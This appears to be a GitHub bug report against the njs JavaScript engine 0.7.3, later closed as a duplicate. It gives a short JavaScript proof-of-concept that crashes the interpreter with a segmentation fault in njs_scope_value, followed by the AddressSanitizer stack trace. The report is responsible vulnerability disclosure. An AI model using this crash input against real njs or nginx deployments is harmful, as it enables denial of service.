SEGV src/njs_scope.h:73 in njs_scope_value

[xmzyshypnc]

Environment

OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

PoC

function main() {
    function func1(v1, v2) {
        Object.toString = v1;

        function func2() {
            try {
                var v9 = JSON[Object]();
            } catch (v10) {} finally {}
        }
        func2(func2, func1);
    }
    func1(func1);
}
main();

Stack dump

AddressSanitizer:DEADLYSIGNAL

==1797452==ERROR: AddressSanitizer: SEGV on unknown address 0x623740000128 (pc 0x55b5eda44bd3 bp 0x7ffd8f57c8b0 sp 0x7ffd8f57c080 T0)
==1797452==The signal is caused by a READ memory access.
#0 0x55b5eda44bd2 in njs_scope_value src/njs_scope.h:73
#1 0x55b5eda44bd2 in njs_scope_valid_value src/njs_scope.h:83
#2 0x55b5eda44bd2 in njs_vmcode_interpreter src/njs_vmcode.c:153
#3 0x55b5edaa0aba in njs_function_lambda_call src/njs_function.c:703
#4 0x55b5eda470fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#5 0x55b5edaa0aba in njs_function_lambda_call src/njs_function.c:703
#6 0x55b5eda470fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#7 0x55b5eda410ba in njs_vm_start src/njs_vm.c:553
#8 0x55b5eda2a3f8 in njs_process_script src/njs_shell.c:890
#9 0x55b5eda2aebf in njs_process_file src/njs_shell.c:619
#10 0x55b5eda2c21f in main src/njs_shell.c:303
#11 0x7f9edef54082 in __libc_start_main ../csu/libc-start.c:308
#12 0x55b5eda27c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_scope.h:73 in njs_scope_value
==1797452==ABORTING

Credit

xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)

[xeioex]

Duplicated of #467